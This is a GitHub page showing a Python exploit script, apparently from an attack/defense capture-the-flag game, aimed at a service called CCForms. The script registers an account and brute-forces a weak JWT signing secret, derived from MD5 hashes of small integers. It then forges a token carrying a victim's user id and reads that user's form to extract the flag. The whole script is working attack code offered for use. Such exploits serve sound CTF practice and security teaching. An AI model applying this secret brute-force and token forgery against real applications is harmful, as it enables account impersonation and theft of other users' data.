-
Notifications
You must be signed in to change notification settings - Fork 1
/
CCForms-1-jwtsecret.py
57 lines (42 loc) · 1.36 KB
/
CCForms-1-jwtsecret.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python3
import json
import sys
import requests
import hashlib
import jwt
import re
from utils import *
PORT = 3001
def exploit(ip, flag_id):
client = ClientSession(ip, PORT)
client.register()
cred = client.export_credentials()
token = cred['token']
print(f"JWT: {token}")
print('Bruteforcing secret...')
secret = None
for i in range(32768):
s = hashlib.md5((str(i) + '\n').encode()).hexdigest() + ' -'
try:
jwt.decode(token, s, algorithms=['HS256'])
print("Found secret")
print(f"Secret: {s}")
secret = s
break
except jwt.exceptions.InvalidSignatureError:
continue
if secret is None:
raise Exception("Failed to find secret")
newtoken = jwt.encode({'id': flag_id['user_id'], 'username': 'x'}, secret, algorithm='HS256')
r = requests.get(f'http://{ip}:{PORT}/form/{flag_id["form_id"]}', headers={'Authorization': f'Bearer {newtoken}'})
if r.status_code != 200:
raise Exception(f"Failed to get flag: {r.text}")
m = re.search(r'[A-Z0-9]{31}=', r.text)
if m is None:
raise Exception("Failed to find flag in " + r.text)
flag = m.group(0)
return flag
if __name__ == "__main__":
ip = sys.argv[1]
flag_id = json.loads(sys.argv[2])
print(exploit(ip, flag_id))